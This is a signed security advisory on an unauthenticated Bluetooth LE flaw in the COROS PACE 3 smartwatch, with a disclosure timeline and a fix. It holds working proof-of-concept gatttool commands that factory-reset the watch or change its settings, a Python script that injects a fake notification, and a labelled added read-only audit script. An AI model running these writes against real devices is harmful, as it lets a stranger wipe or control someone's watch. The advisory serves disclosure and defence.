-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2025-026
Product: COROS PACE 3; other models might also be affected [6]
Manufacturer: COROS Wearables, Inc.
Affected Version(s): <= V 3.1008.0
Tested Version(s): V 3.0808.0
Vulnerability Type: Missing Authentication for Critical Function (CWE-306)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2025-03-14
Solution Date: July/August 2025 (see vendor notes [6])
Public Disclosure: 2025-06-17
CVE Reference: CVE-2025-32879
Author of Advisory: Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The COROS PACE 3 is a professional GPS sport smart watch.

The manufacturer describes the product as follows (see [1]):

"Improving on its legendary predecessor in every way, PACE 3 packs an even
more powerful punch. Track your training and recovery with a watch that's
lightweight and comfortable, with advanced technology, outstanding data
accuracy, and backed by the industry-leading COROS training software
system. The COROS PACE 3 paves the way to discover your potential."

Due to missing authentication for reading and writing Bluetooth Low Energy
(BLE) services and their characteristics, an attacker within Bluetooth
range is able to interact with the COROS PACE 3 without any pairing or
bonding. This allows complete control of the device.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The COROS PACE 3 starts advertising whenever no device is connected via
Bluetooth. This allows an attacker to connect to the watch via BLE as soon
as no other device (e.g. the owner's smartphone) is connected.

While connected, none of the BLE services and characteristics of the COROS
PACE 3 require any authentication or security level. Therefore, every
characteristic, depending on its mode of operation (read/write/notify), can
be used by the connected attacker.
This allows, for example, configuring the device, sending notifications,
resetting the device to factory settings, or installing software files.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

All of the following examples write to the same characteristic (handle
0x0019 in the tested firmware) without any prior pairing or bonding.

Example #1: device factory reset:

$ gatttool -b F7:AF:1D:27:03:A5 --char-write-req --handle=0x0019 --value=850001

Example #2: deactivating the do not disturb (DND) setting:

$ gatttool -b F7:AF:1D:27:03:A5 --char-write-req --handle=0x0019 --value=860000010604111c

Example #3: triggering "find my device":

$ gatttool -b F7:AF:1D:27:03:A5 --char-write-req --handle=0x0019 --value=b400

Example #4: sending a malicious notification:

####################
import asyncio

from bleak import BleakClient

# Bluetooth address of the target watch
DEVICE_ADDRESS = "F7:AF:1D:27:03:b0"
# 128-bit UUID of the unauthenticated characteristic (hyphenated form of
# 6e400001b5a3f393e0a977757c7f7f70)
CHARACTERISTIC_UUID = "6e400001-b5a3-f393-e0a9-77757c7f7f70"
# Notification frame; the payload carries the ASCII strings "com.wire",
# "HACKED" and "hacked by SySS", which the watch displays as a notification
DATA = bytes.fromhex(
    "7900ff0008636f6d2e7769726510064841434b454420"
    "176861636b65642062792053795353200000"
)


async def write_to_ble_device():
    client = BleakClient(DEVICE_ADDRESS)
    try:
        # Plain connection: no pairing or bonding is requested at any point
        await client.connect()
        await asyncio.sleep(2)
        if client.is_connected:
            print(f"connected to {DEVICE_ADDRESS}")
            # Write without response; the watch accepts it unauthenticated
            await client.write_gatt_char(CHARACTERISTIC_UUID, DATA, response=False)
            print("Press ctrl-c to disconnect")
            # Keep the connection open so the notification stays visible
            await asyncio.Event().wait()
    except Exception as e:
        print(f"Error: {e}")
    finally:
        if client.is_connected:
            await client.disconnect()


asyncio.run(write_to_ble_device())
####################

Executing the script:

$ python3 poc.py

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

According to the vendor note [6], the vulnerability was addressed in
firmware updates for several devices. Users should install the update
provided by the manufacturer; since all versions up to and including
V 3.1008.0 are affected, the installed firmware must be newer than that.
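A generic check for the weakness class described in the Vulnerability
Details and exercised by the PoC above (GATT characteristics usable without
pairing), as an added example: this is neither SySS nor COROS code and not
the PoC from this advisory. It connects to a peripheral with bleak without
pairing or bonding, reads every readable characteristic, subscribes to every
notifying one, and reports which operations the device allows anyway.
Write-capable characteristics are only listed, never written, because on
this watch a single unauthenticated write is a factory reset (Example #1).
Assumptions: the BlueZ error wording in SECURITY_REJECTION_MARKERS (BlueZ is
assumed to report ATT "Insufficient Authentication/Encryption" as "Not
paired"), the STANDARD_PUBLIC_SERVICES allowlist of SIG services that are
expected to be readable by anyone, and the target address, which defaults to
the one used in the PoC.

```python
"""Unauthenticated GATT surface audit for a BLE peripheral.

Added example (not SySS or COROS code). Connects WITHOUT pairing or bonding,
reads every readable characteristic, subscribes to every notifying one and
records what the peripheral allowed. Write-capable characteristics are listed
but never written: on the COROS PACE 3 one unauthenticated write is a factory
reset, so writes need a deliberate, manual test.
"""
import asyncio
from dataclasses import dataclass

# Bluetooth SIG base UUID suffix; 16-bit SIG UUIDs sit at hex positions 4..8.
BT_BASE_SUFFIX = "-0000-1000-8000-00805f9b34fb"

# SIG services normally readable by any central: GAP (1800), GATT (1801),
# Device Information (180A), Battery (180F). Assumed allowlist: an
# unauthenticated read here is expected, not a finding.
STANDARD_PUBLIC_SERVICES = {"1800", "1801", "180a", "180f"}

# Substrings of backend error messages meaning the peripheral enforced
# security (ATT 0x05 Insufficient Authentication, 0x08 Insufficient
# Authorization, 0x0F Insufficient Encryption). Assumption: BlueZ wording
# ("Not paired", "Not Authorized"); other bleak backends may differ.
SECURITY_REJECTION_MARKERS = ("not paired", "authent", "authoriz", "encrypt")


@dataclass
class Probe:
    """Result of probing one characteristic without authentication."""
    service_uuid: str
    char_uuid: str
    handle: int
    properties: tuple               # e.g. ("read", "write", "notify")
    read_result: str = "skipped"    # "ok:<hex>", "rejected:<msg>", "error:<msg>"
    notify_result: str = "skipped"  # "ok:subscribed", "rejected:<msg>", "error:<msg>"


def short_uuid(uuid128):
    """Return the 16-bit form ("180f") of a SIG UUID, else the full lowercase UUID."""
    u = uuid128.lower()
    if u.startswith("0000") and u.endswith(BT_BASE_SUFFIX):
        return u[4:8]
    return u


def is_standard_public(service_uuid):
    return short_uuid(service_uuid) in STANDARD_PUBLIC_SERVICES


def outcome(exc):
    """Classify a failed probe: security rejection vs. any other error."""
    msg = str(exc)
    if any(marker in msg.lower() for marker in SECURITY_REJECTION_MARKERS):
        return "rejected:" + msg
    return "error:" + msg


def classify(p):
    """One verdict per characteristic, derived only from what the device allowed."""
    results = (p.read_result, p.notify_result)
    if any(r.startswith("ok:") for r in results):
        return "expected-public" if is_standard_public(p.service_uuid) else "UNAUTHENTICATED"
    if any(r.startswith("rejected:") for r in results):
        return "protected"
    if any(r.startswith("error:") for r in results):
        return "error"
    if {"write", "write-without-response"} & set(p.properties):
        return "write-only: test manually"
    return "not probed"


def summarize(probes):
    """Count verdicts, e.g. {"UNAUTHENTICATED": 12, "protected": 0}."""
    counts = {}
    for p in probes:
        counts[classify(p)] = counts.get(classify(p), 0) + 1
    return counts


def report(probes):
    """One line per characteristic: handle, UUID, properties, verdict."""
    return [f"{p.handle:#06x} {p.char_uuid} {','.join(p.properties):<30} {classify(p)}"
            for p in probes]


async def probe_device(address, settle_seconds=2.0, notify_wait=1.0):
    """Connect without pairing and probe every characteristic (needs a BLE adapter)."""
    from bleak import BleakClient  # imported here so the logic above runs without a radio

    probes = []
    async with BleakClient(address) as client:
        await asyncio.sleep(settle_seconds)  # let service discovery settle
        for service in client.services:
            for char in service.characteristics:
                p = Probe(service.uuid, char.uuid, char.handle, tuple(char.properties))
                if "read" in char.properties:
                    try:
                        p.read_result = "ok:" + bytes(await client.read_gatt_char(char)).hex()
                    except Exception as exc:
                        p.read_result = outcome(exc)
                if "notify" in char.properties or "indicate" in char.properties:
                    try:
                        await client.start_notify(char, lambda _sender, _data: None)
                        await asyncio.sleep(notify_wait)
                        await client.stop_notify(char)
                        p.notify_result = "ok:subscribed"
                    except Exception as exc:
                        p.notify_result = outcome(exc)
                probes.append(p)
    return probes


if __name__ == "__main__":
    import sys

    # Placeholder target: defaults to the address used in the PoC above
    target = sys.argv[1] if len(sys.argv) > 1 else "F7:AF:1D:27:03:A5"
    found = asyncio.run(probe_device(target))
    print("\n".join(report(found)))
    print(summarize(found))
```

Run it as "python3 gatt_audit.py <address>" while the owner's phone is out
of range (the watch only advertises when nothing is connected). Any vendor
characteristic reported as UNAUTHENTICATED is the condition this advisory
describes. Two caveats: the verdict is only as good as the backend's error
wording, so "error" rows need a manual look, and bleak on BlueZ does not
pair unless told to, whereas the Windows and macOS backends may let the OS
start pairing on its own when a peripheral demands it, which would mask a
"protected" result as a successful read.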
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-03-10: Vulnerability discovered
2025-03-14: Vulnerability reported to manufacturer
2025-03-14: Confirmation of receipt received
2025-03-17: Asked the manufacturer for an update
2025-03-31: More information provided to the manufacturer
2025-04-07: Asked the manufacturer for an update
2025-04-14: Informed the manufacturer about the assigned CVE-ID and asked
            for an update once again
2025-04-15: Answer received from the manufacturer; the manufacturer informed
            SySS GmbH that a fix for the vulnerability is planned for the
            end of the year (2025)
2025-04-15: Receipt confirmed, and the issue was clarified once more, along
            with a recommendation for prompt resolution
2025-06-17: Public disclosure
2025-08-06: The vendor notified SySS GmbH of updates to the security patch
            notes
2025-08-11: Advisory update

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] COROS PACE 3 product website
    https://eu.coros.com/pace3
[2] SySS Security Advisory SYSS-2025-026
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-026.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[4] CVE-2025-32879
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32879
[5] Detailed blog post
    https://blog.syss.com/posts/bluetooth-analysis-coros-pace-3/
[6] Vendor notes about the vulnerability and security patches
    https://support.coros.com/hc/en-us/articles/38933102526996-Bluetooth-Security-Vulnerability-Statement

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.
E-Mail: moritz.abrell@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" and
without warranty of any kind. Details of this security advisory may be
updated in order to provide as accurate information as possible. The latest
version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmiZ3acACgkQrgyb+PE0
i1ON4g/9H4nnHyOOzW8PgtmVrS8tyFSZKKQJ4KtFZxR3mBzDFgrseHJnJA93WrgK
5ueEq/fT3LOcgQKzpZE5XgLS4gS9IAXMVb7nm0rqzqEd9Ihll0Mgn77UI2RzbMWD
JmrCYfeVE9nmKnnkF/BS3a2TjLB1ynUlNHXJ5PuT0D9ZSYXxJ1C9X2cx7w+Zgfrh
iqIILngT1adegwd29OJTg/RgQrisSwGy5uEwWCADrfr5WBrAsxrjZkZuOEew02OT
OaX3DbssBxy2/ncos1r0zdWiEuINu6EQQMBYB66u/y3uPjTRWVcAXZVmFW1wNN7k
Lp2M27bZCqgbCLvS4nadxytrw14GQt4zQbNgfyzMGD4JIFuRBWkIG0WTDn3QnhJn
vcxfTqQ//LMR/s4m+KopMv0zxocE/P3m0SZJMinuogT3Yai5juOU8Hy99GnFXF0M
QWLvxGqGD/l9YupTG1sQsDYfQYn7xHY73V3zm6AipxcGJYk++cVP8jvsyVYpPGib
uFTU08wxi3ve3JgAjjkY5jrFjPQNcpgdkP5QJnZn2IYNLq/9yFbmIRkA40GnilaY
qW8jb3qDIA/OnCFXbijl5UBndL3PCgjdbEMw3ADFtUpgl6dSoD+vR7mNhDa0fx6R
9bzi9W7d4Aj5zUXwiPeBrKdlfVKYD1e3NFMI49jokT+LcDAiM88=
=r72D
-----END PGP SIGNATURE-----